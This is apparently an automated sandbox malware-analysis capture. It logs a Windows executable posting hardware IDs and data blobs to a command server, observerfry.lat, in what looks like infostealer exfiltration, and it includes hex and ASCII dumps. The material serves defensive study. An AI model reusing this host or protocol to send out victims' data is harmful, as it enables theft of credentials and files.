                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2FJhceBAAbICAZgl1kQC7jB4vBliqvCsxZoX1V7MUhJYYCcs6vKpGhwLsIY7TJt3f1Cn%2FQyw6LbNXSHCqN0Zdlo690XgrRm7UVzcngPdQhaO3uCwvE3ka7yS7uhhLbZr2P0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f667f05b88d0cc4-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1782&min_rtt=1729&rtt_var=686&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=952&delivery_rate=1688837&cwnd=147&unsent_bytes=0&cid=d109dc3d5b01045e&ts=776&x=0"
                                                                                                                                                                    2024-12-23 07:04:12 UTC248INData Raw: 31 34 37 66 0d 0a 77 4f 50 6e 57 2f 66 49 76 31 66 59 6b 6a 5a 36 41 6d 75 72 73 6a 79 58 46 6d 2b 4e 47 43 34 2f 30 46 48 50 74 70 69 71 4f 74 69 37 77 5a 46 35 7a 66 79 54 64 61 76 33 46 45 42 32 47 64 37 58 45 4c 56 33 43 36 38 69 53 46 36 38 49 71 71 61 75 74 78 58 2b 76 71 46 68 6a 65 45 72 5a 4e 31 76 65 6f 55 51 46 6b 51 69 64 64 53 74 53 78 4e 36 48 4a 4d 58 72 77 7a 72 74 33 33 32 6c 61 37 71 49 2b 41 4d 35 4b 72 32 7a 61 30 2f 31 4d 66 5a 77 72 42 33 46 58 36 66 67 4b 76 4e 41 78 61 71 6e 50 31 6c 4e 58 50 54 72 6d 4e 67 70 51 77 31 62 57 54 4c 50 72 33 57 46 67 34 53 63 72 58 58 76 74 77 43 2b 5a 77 52 6c 65 30 4d 71 76 63 36 4d 4e 63 73 4b 69 42 67 7a 4b 59 6f 73 38 37 76 76 68 59 47 57 30 4b 69 5a 34 65 38 6d 78 4e 74 7a
                                                                                                                                                                    Data Ascii: 147fwOPnW/fIv1fYkjZ6AmursjyXFm+NGC4/0FHPtpiqOti7wZF5zfyTdav3FEB2Gd7XELV3C68iSF68IqqautxX+vqFhjeErZN1veoUQFkQiddStSxN6HJMXrwzrt332la7qI+AM5Kr2za0/1MfZwrB3FX6fgKvNAxaqnP1lNXPTrmNgpQw1bWTLPr3WFg4ScrXXvtwC+ZwRle0Mqvc6MNcsKiBgzKYos87vvhYGW0KiZ4e8mxNtz
                                                                                                                                                                    2024-12-23 07:04:12 UTC1369INData Raw: 6f 66 62 37 45 69 76 4d 48 33 32 46 37 36 76 63 2b 63 65 5a 4b 6d 6e 57 33 36 2b 46 67 57 5a 51 72 47 31 31 2f 31 5a 67 4c 76 65 55 52 56 74 6a 6d 69 32 2f 58 47 55 72 32 71 69 49 49 32 6b 71 4c 62 4f 72 6d 77 47 6c 68 6e 45 59 6d 49 48 74 56 6b 44 75 78 75 51 55 7a 79 4c 4f 50 4e 75 73 39 55 2b 76 72 42 67 7a 65 55 70 39 30 6e 73 76 74 66 48 58 49 43 77 4e 31 54 39 58 6b 48 34 48 6c 4d 57 72 67 35 6f 74 37 2b 78 56 57 38 6f 6f 48 46 64 39 57 74 78 58 58 69 73 48 63 64 63 41 37 46 78 68 7a 50 4e 42 4b 68 59 77 78 61 76 6e 50 31 6c 50 4c 4e 57 37 6d 70 6a 6f 59 78 6e 72 6a 64 4a 37 7a 39 55 51 70 6d 44 4d 66 61 58 65 64 2b 41 2b 6c 35 52 56 61 37 4e 71 72 51 75 6f 59 59 76 62 72 42 33 58 6d 30 70 39 59 35 73 4f 64 55 57 48 39 48 30 4a 42 5a 2b 54 52 56 72
                                                                                                                                                                    Data Ascii: ofb7EivMH32F76vc+ceZKmnW36+FgWZQrG11/1ZgLveURVtjmi2/XGUr2qiII2kqLbOrmwGlhnEYmIHtVkDuxuQUzyLOPNus9U+vrBgzeUp90nsvtfHXICwN1T9XkH4HlMWrg5ot7+xVW8ooHFd9WtxXXisHcdcA7FxhzPNBKhYwxavnP1lPLNW7mpjoYxnrjdJ7z9UQpmDMfaXed+A+l5RVa7NqrQuoYYvbrB3Xm0p9Y5sOdUWH9H0JBZ+TRVr
                                                                                                                                                                    2024-12-23 07:04:12 UTC1369INData Raw: 79 66 65 33 54 34 6f 67 41 2b 6f 69 43 6b 54 71 66 36 4f 67 32 74 50 35 54 44 69 41 57 68 38 6b 65 38 6e 68 4e 74 7a 70 42 58 4c 6f 31 76 39 76 33 79 31 61 30 72 59 53 4b 4d 5a 57 71 30 44 43 2b 2b 31 38 62 62 51 33 62 32 6c 37 39 63 51 7a 6c 63 41 77 54 38 6a 53 31 6c 4b 4b 49 61 61 32 70 77 37 41 36 6d 36 54 61 49 2f 72 76 47 67 45 67 44 73 57 51 42 72 56 35 42 65 70 2f 51 31 79 34 50 61 6a 65 39 73 42 57 75 62 43 4f 67 54 6d 5a 6f 74 63 34 74 50 52 63 45 57 73 43 7a 39 42 66 2f 7a 52 44 72 33 31 55 48 65 70 7a 6d 64 50 32 78 56 66 34 6c 34 4b 4c 4e 35 4b 38 6e 53 72 30 36 52 51 66 62 45 6d 52 6b 46 4c 38 64 41 62 6c 66 6b 78 61 76 7a 61 75 30 2f 6e 46 58 37 43 73 68 6f 45 31 6e 4b 66 62 4e 62 33 30 55 51 70 6c 41 4d 58 63 48 72 73 30 43 76 63 36 46 42
                                                                                                                                                                    Data Ascii: yfe3T4ogA+oiCkTqf6Og2tP5TDiAWh8ke8nhNtzpBXLo1v9v3y1a0rYSKMZWq0DC++18bbQ3b2l79cQzlcAwT8jS1lKKIaa2pw7A6m6TaI/rvGgEgDsWQBrV5Bep/Q1y4Paje9sBWubCOgTmZotc4tPRcEWsCz9Bf/zRDr31UHepzmdP2xVf4l4KLN5K8nSr06RQfbEmRkFL8dAblfkxavzau0/nFX7CshoE1nKfbNb30UQplAMXcHrs0Cvc6FB
                                                                                                                                                                    2024-12-23 07:04:12 UTC1369INData Raw: 6c 4b 4b 49 55 62 4f 77 6a 34 73 77 6d 4b 7a 56 4d 72 54 39 58 78 35 72 44 73 37 57 55 2f 31 35 43 4f 78 37 53 46 65 67 4d 4b 62 65 39 38 49 59 39 4f 4b 47 6e 58 6e 4e 36 76 6f 35 6b 2b 42 50 43 6e 5a 4a 31 70 35 48 74 58 4d 42 72 79 49 4d 58 72 30 36 6f 74 7a 79 78 31 65 2b 72 49 65 44 4e 4a 43 6c 31 79 65 79 2f 6c 6b 54 62 77 4c 62 30 46 50 78 65 41 6e 6e 63 55 59 64 2f 48 4f 71 7a 4c 71 51 47 49 2b 76 6a 6f 55 36 67 2b 72 43 65 36 4f 77 55 78 51 67 55 59 6e 63 55 50 56 37 41 65 4e 78 52 46 79 2b 50 61 72 52 38 38 42 51 71 4b 4f 46 6a 54 69 62 70 64 77 78 76 2f 56 51 48 32 51 50 78 70 41 51 74 58 4d 56 72 79 49 4d 63 70 55 47 37 2f 58 41 69 45 66 30 75 38 47 43 4e 64 58 79 6e 54 6d 35 2f 46 77 58 5a 67 44 46 32 6c 66 2b 65 41 62 72 64 6b 56 59 74 44 4b
                                                                                                                                                                    Data Ascii: lKKIUbOwj4swmKzVMrT9Xx5rDs7WU/15COx7SFegMKbe98IY9OKGnXnN6vo5k+BPCnZJ1p5HtXMBryIMXr06otzyx1e+rIeDNJCl1yey/lkTbwLb0FPxeAnncUYd/HOqzLqQGI+vjoU6g+rCe6OwUxQgUYncUPV7AeNxRFy+ParR88BQqKOFjTibpdwxv/VQH2QPxpAQtXMVryIMcpUG7/XAiEf0u8GCNdXynTm5/FwXZgDF2lf+eAbrdkVYtDK
                                                                                                                                                                    2024-12-23 07:04:12 UTC900INData Raw: 6c 2b 7a 73 49 2b 49 4e 70 32 69 31 44 53 2b 39 56 6b 65 62 41 50 49 31 31 44 37 66 45 32 68 4f 6b 74 46 38 6d 76 74 39 65 72 54 53 71 79 76 6f 49 67 32 31 62 57 54 4c 50 72 33 57 46 67 34 53 63 44 43 57 76 68 6d 42 4f 68 30 51 31 36 67 4d 71 44 66 36 4d 39 58 76 71 57 4e 67 7a 61 54 71 39 67 2f 74 76 64 52 45 32 38 46 69 5a 34 65 38 6d 78 4e 74 7a 70 69 56 71 45 6b 72 74 72 78 33 6b 50 36 76 63 2b 63 65 5a 4b 6d 6e 57 33 36 38 31 38 54 5a 41 6e 46 30 46 72 34 64 42 2f 67 66 55 74 55 75 53 47 6e 30 2f 33 44 55 4c 47 74 68 35 63 31 6d 37 6a 59 4a 36 69 77 47 6c 68 6e 45 59 6d 49 48 73 4e 7a 48 66 39 35 44 6d 79 6b 4d 4c 76 66 39 38 51 59 70 65 79 59 78 54 36 5a 36 6f 56 31 76 50 39 64 47 32 38 49 77 4e 78 54 38 48 30 49 37 6e 78 49 56 37 67 7a 71 39 4c 37
                                                                                                                                                                    Data Ascii: l+zsI+INp2i1DS+9VkebAPI11D7fE2hOktF8mvt9erTSqyvoIg21bWTLPr3WFg4ScDCWvhmBOh0Q16gMqDf6M9XvqWNgzaTq9g/tvdRE28FiZ4e8mxNtzpiVqEkrtrx3kP6vc+ceZKmnW36818TZAnF0Fr4dB/gfUtUuSGn0/3DULGth5c1m7jYJ6iwGlhnEYmIHsNzHf95DmykMLvf98QYpeyYxT6Z6oV1vP9dG28IwNxT8H0I7nxIV7gzq9L7
                                                                                                                                                                    2024-12-23 07:04:12 UTC1369INData Raw: 33 34 39 64 0d 0a 79 71 6f 47 44 4d 35 47 70 31 44 61 39 2b 56 49 54 59 77 50 47 31 31 6a 78 64 41 62 6f 64 45 70 59 75 54 72 74 6d 72 72 50 51 50 72 36 77 61 4d 61 68 37 6a 76 4f 37 6e 72 46 41 63 75 45 49 6e 58 55 72 55 73 54 65 52 79 51 30 2b 33 4f 71 58 51 38 38 68 63 73 4b 2b 47 68 54 79 59 72 39 6b 37 76 76 64 55 46 47 38 4f 77 64 39 61 39 58 74 4e 6f 54 70 4c 52 66 4a 72 37 66 54 78 33 6e 6d 30 71 5a 50 46 4a 74 75 7a 6e 54 4b 32 73 41 78 59 62 67 44 49 32 46 44 35 66 41 6e 39 65 6b 64 55 76 54 4b 69 31 50 6e 4a 55 72 4b 77 68 34 55 79 6e 61 33 56 4d 62 54 69 56 52 63 67 52 34 6e 58 52 72 55 73 54 64 35 73 53 31 71 39 63 59 54 54 34 63 6c 53 75 61 6d 4e 78 53 62 62 73 35 30 79 74 72 41 4d 57 47 30 46 78 4e 52 4d 2b 58 51 4e 35 6e 31 47 54 37 30 38
                                                                                                                                                                    Data Ascii: 349dyqoGDM5Gp1Da9+VITYwPG11jxdAbodEpYuTrtmrrPQPr6waMah7jvO7nrFAcuEInXUrUsTeRyQ0+3OqXQ88hcsK+GhTyYr9k7vvdUFG8Owd9a9XtNoTpLRfJr7fTx3nm0qZPFJtuznTK2sAxYbgDI2FD5fAn9ekdUvTKi1PnJUrKwh4Uyna3VMbTiVRcgR4nXRrUsTd5sS1q9cYTT4clSuamNxSbbs50ytrAMWG0FxNRM+XQN5n1GT708
                                                                                                                                                                    2024-12-23 07:04:12 UTC1369INData Raw: 4a 66 74 4c 43 41 6a 7a 57 55 72 64 6f 2b 71 50 74 47 45 32 67 4b 78 39 68 58 39 58 6f 4e 37 6e 64 4d 48 66 78 7a 71 73 79 36 6b 42 69 66 67 5a 61 54 4d 39 65 4a 79 69 4f 77 39 31 67 4f 61 77 6a 4b 78 6c 50 6c 4e 45 4f 76 61 30 74 4d 38 6d 75 37 78 4f 33 50 52 2f 53 37 77 59 49 31 31 66 4b 64 50 72 58 2b 57 52 4e 6b 41 4d 7a 59 58 66 42 78 42 2b 4e 32 54 56 57 37 4f 61 6a 52 2f 4d 4a 62 74 4b 32 41 69 54 32 63 70 4e 52 31 39 4c 42 54 41 43 42 52 69 65 5a 4f 38 6d 77 41 2f 7a 68 2b 58 71 4d 69 75 4e 6e 71 7a 68 71 56 6f 59 32 47 50 4a 4b 36 6e 53 72 30 36 52 51 66 62 45 6d 52 6b 46 37 78 65 41 37 6f 64 45 4e 51 76 54 53 6d 32 2f 44 47 53 72 57 6e 69 59 6b 78 6d 4c 6a 58 50 36 6a 35 58 52 56 75 41 64 76 54 48 72 73 30 43 76 63 36 46 42 32 41 4f 61 37 59 37
                                                                                                                                                                    Data Ascii: JftLCAjzWUrdo+qPtGE2gKx9hX9XoN7ndMHfxzqsy6kBifgZaTM9eJyiOw91gOawjKxlPlNEOva0tM8mu7xO3PR/S7wYI11fKdPrX+WRNkAMzYXfBxB+N2TVW7OajR/MJbtK2AiT2cpNR19LBTACBRieZO8mwA/zh+XqMiuNnqzhqVoY2GPJK6nSr06RQfbEmRkF7xeA7odENQvTSm2/DGSrWniYkxmLjXP6j5XRVuAdvTHrs0Cvc6FB2AOa7Y7
                                                                                                                                                                    2024-12-23 07:04:12 UTC1369INData Raw: 6e 68 72 73 48 6d 36 33 4a 4d 72 54 32 56 46 67 75 53 63 61 51 42 73 77 30 52 61 39 46 41 68 32 71 63 2f 57 55 7a 38 74 57 74 4b 57 58 6c 48 53 32 76 63 73 2f 6f 62 4a 79 48 33 45 41 33 39 31 4d 74 54 70 4e 36 54 6f 55 44 66 78 7a 71 63 57 36 6b 41 6a 6f 2b 64 54 57 62 73 58 34 77 6e 75 6a 73 45 4a 59 4f 46 75 48 6b 45 79 31 4c 45 32 6f 65 56 35 50 74 44 43 37 31 37 33 32 5a 70 71 70 6c 34 51 30 6e 71 62 6a 43 36 2f 7a 57 68 5a 6e 48 39 69 51 45 4c 56 37 54 62 64 44 44 42 58 79 44 4f 4f 55 34 6f 67 41 2b 70 65 43 69 7a 65 53 76 4d 78 34 6d 76 74 43 47 57 30 43 78 5a 4a 66 2b 47 51 4b 72 7a 51 4d 57 2f 4a 72 2f 5a 71 36 7a 45 6e 36 2b 74 48 58 59 73 44 35 69 6d 58 6f 37 78 6f 42 49 42 2b 4a 69 41 79 37 4e 42 2b 76 49 67 77 61 73 53 47 2f 30 76 6e 65 57 2f
                                                                                                                                                                    Data Ascii: nhrsHm63JMrT2VFguScaQBsw0Ra9FAh2qc/WUz8tWtKWXlHS2vcs/obJyH3EA391MtTpN6ToUDfxzqcW6kAjo+dTWbsX4wnujsEJYOFuHkEy1LE2oeV5PtDC71732Zpqpl4Q0nqbjC6/zWhZnH9iQELV7TbdDDBXyDOOU4ogA+peCizeSvMx4mvtCGW0CxZJf+GQKrzQMW/Jr/Zq6zEn6+tHXYsD5imXo7xoBIB+JiAy7NB+vIgwasSG/0vneW/
                                                                                                                                                                    2024-12-23 07:04:12 UTC1369INData Raw: 65 5a 50 71 68 57 66 30 73 46 41 4a 49 46 47 5a 67 67 57 67 4a 31 71 2f 4b 46 4d 54 71 33 4f 37 6c 4b 4b 61 46 76 71 77 77 64 31 35 30 71 6e 50 4a 37 7a 7a 51 68 73 6e 4e 2f 66 32 58 66 4a 79 44 75 46 74 58 52 2b 64 4d 4b 62 59 39 73 39 4f 68 4a 79 55 68 6a 65 62 72 63 73 6b 2b 72 34 55 46 79 42 52 38 4a 42 50 2f 33 4e 42 70 7a 5a 64 54 72 77 34 75 39 4f 36 39 78 62 36 75 73 48 64 65 61 43 70 30 7a 75 39 35 6b 56 56 52 67 72 4f 31 6c 33 37 59 78 79 76 4e 41 78 62 38 6d 76 2f 6d 72 72 4d 53 66 72 36 30 64 64 69 77 50 6d 4b 5a 65 6a 76 47 67 45 67 48 34 6d 49 44 62 73 30 48 36 38 69 44 42 71 38 50 71 7a 58 39 4d 74 4b 71 4b 53 43 6b 7a 72 53 6c 4f 4d 51 74 2f 31 52 46 6d 63 33 39 2f 46 55 35 58 6b 43 36 45 52 79 61 71 4d 30 76 5a 62 63 79 30 36 35 34 73 2f
                                                                                                                                                                    Data Ascii: eZPqhWf0sFAJIFGZggWgJ1q/KFMTq3O7lKKaFvqwwd150qnPJ7zzQhsnN/f2XfJyDuFtXR+dMKbY9s9OhJyUhjebrcsk+r4UFyBR8JBP/3NBpzZdTrw4u9O69xb6usHdeaCp0zu95kVVRgrO1l37YxyvNAxb8mv/mrrMSfr60ddiwPmKZejvGgEgH4mIDbs0H68iDBq8PqzX9MtKqKSCkzrSlOMQt/1RFmc39/FU5XkC6ERyaqM0vZbcy0654s/


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.1049709104.21.36.2014437200C:\Users\user\Desktop\Yh6fS6qfTE.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-23 07:04:14 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=0EJN6A3PZ
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 12799
                                                                                                                                                                    Host: observerfry.lat
                                                                                                                                                                    2024-12-23 07:04:14 UTC12799OUTData Raw: 2d 2d 30 45 4a 4e 36 41 33 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 37 45 30 38 30 44 36 38 37 45 36 43 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 45 4a 4e 36 41 33 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 45 4a 4e 36 41 33 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 45 4a 4e 36 41 33 50 5a 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                    Data Ascii: --0EJN6A3PZContent-Disposition: form-data; name="hwid"B67E080D687E6C19AC8923850305D13E--0EJN6A3PZContent-Disposition: form-data; name="pid"2--0EJN6A3PZContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--0EJN6A3PZConten
                                                                                                                                                                    2024-12-23 07:04:15 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 23 Dec 2024 07:04:15 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=t2g25ugpsp5tsi54rbfqip4nhl; expires=Fri, 18 Apr 2025 00:50:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mT%2Bq%2FjQ4xSmiqc7NuOXFjGPvsEpRcl26y9%2F99gccuPrBEGv%2FRdqMyoHBU9FfB6wjKz3XWyIhsqxQMPJSoFLBCTEdqs0MJQU3HBV9pLdHKHLqPTte2pFXLdFDWJSiURKe%2BLc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f667f13cf697cb4-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1939&rtt_var=742&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13729&delivery_rate=1461461&cwnd=230&unsent_bytes=0&cid=2f4438594be7c192&ts=1363&x=0"
                                                                                                                                                                    2024-12-23 07:04:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                    2024-12-23 07:04:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.1049715104.21.36.2014437200C:\Users\user\Desktop\Yh6fS6qfTE.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-23 07:04:17 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=QP80O4MCUY78Z
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 15050
                                                                                                                                                                    Host: observerfry.lat
                                                                                                                                                                    2024-12-23 07:04:17 UTC15050OUTData Raw: 2d 2d 51 50 38 30 4f 34 4d 43 55 59 37 38 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 37 45 30 38 30 44 36 38 37 45 36 43 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 50 38 30 4f 34 4d 43 55 59 37 38 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 50 38 30 4f 34 4d 43 55 59 37 38 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 51 50 38 30 4f
                                                                                                                                                                    Data Ascii: --QP80O4MCUY78ZContent-Disposition: form-data; name="hwid"B67E080D687E6C19AC8923850305D13E--QP80O4MCUY78ZContent-Disposition: form-data; name="pid"2--QP80O4MCUY78ZContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--QP80O
                                                                                                                                                                    2024-12-23 07:04:18 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 23 Dec 2024 07:04:18 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=i3lt6holqqag94pqnq1aagecvi; expires=Fri, 18 Apr 2025 00:50:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7eQc8v9fornJyOpY64I6nnG4lS6hwBRF6n8myOI4xdnDKKl5ieEetwzK6s4I0BZfdCt0jTvLbazjiw4cD4McMEVy00lz77mznyykG7KKGX2M%2BAxqOV6EFPzUSTIJWILK%2BkY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f667f24ac0d43a9-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1650&rtt_var=628&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15984&delivery_rate=1730883&cwnd=245&unsent_bytes=0&cid=8742977ee10d7d87&ts=982&x=0"
                                                                                                                                                                    2024-12-23 07:04:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                    2024-12-23 07:04:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.1049721104.21.36.2014437200C:\Users\user\Desktop\Yh6fS6qfTE.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-23 07:04:19 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=AOLLEKSDMMCQNPI9
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 20430
                                                                                                                                                                    Host: observerfry.lat
                                                                                                                                                                    2024-12-23 07:04:19 UTC15331OUTData Raw: 2d 2d 41 4f 4c 4c 45 4b 53 44 4d 4d 43 51 4e 50 49 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 37 45 30 38 30 44 36 38 37 45 36 43 31 39 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 4f 4c 4c 45 4b 53 44 4d 4d 43 51 4e 50 49 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 4f 4c 4c 45 4b 53 44 4d 4d 43 51 4e 50 49 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                    Data Ascii: --AOLLEKSDMMCQNPI9Content-Disposition: form-data; name="hwid"B67E080D687E6C19AC8923850305D13E--AOLLEKSDMMCQNPI9Content-Disposition: form-data; name="pid"3--AOLLEKSDMMCQNPI9Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                                    2024-12-23 07:04:19 UTC5099OUTData Raw: 00 00 60 83 eb 8b 82 f9 0d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii: `?lpQ0/74G6(~`~O
                                                                                                                                                                    2024-12-23 07:04:20 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Mon, 23 Dec 2024 07:04:20 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
